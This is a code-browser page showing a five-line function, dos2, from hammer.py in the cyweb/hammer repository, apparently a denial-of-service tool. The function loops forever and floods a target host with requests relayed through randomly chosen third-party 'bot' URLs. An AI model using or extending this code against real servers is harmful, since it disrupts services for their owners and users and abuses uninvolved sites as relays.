MCPcopy
hub / github.com/cyweb/hammer / dos2

Function dos2

hammer.py:70–74  ·  view source on GitHub ↗
()

Source from the content-addressed store, hash-verified

68
69
70def dos2():
71 while True:
72 item=w.get()
73 bot_hammering(random.choice(bots)+"http://"+host)
74 w.task_done()
75
76
77def usage():

Callers

nothing calls this directly

Calls 1

bot_hammeringFunction · 0.85

Tested by

no test coverage detected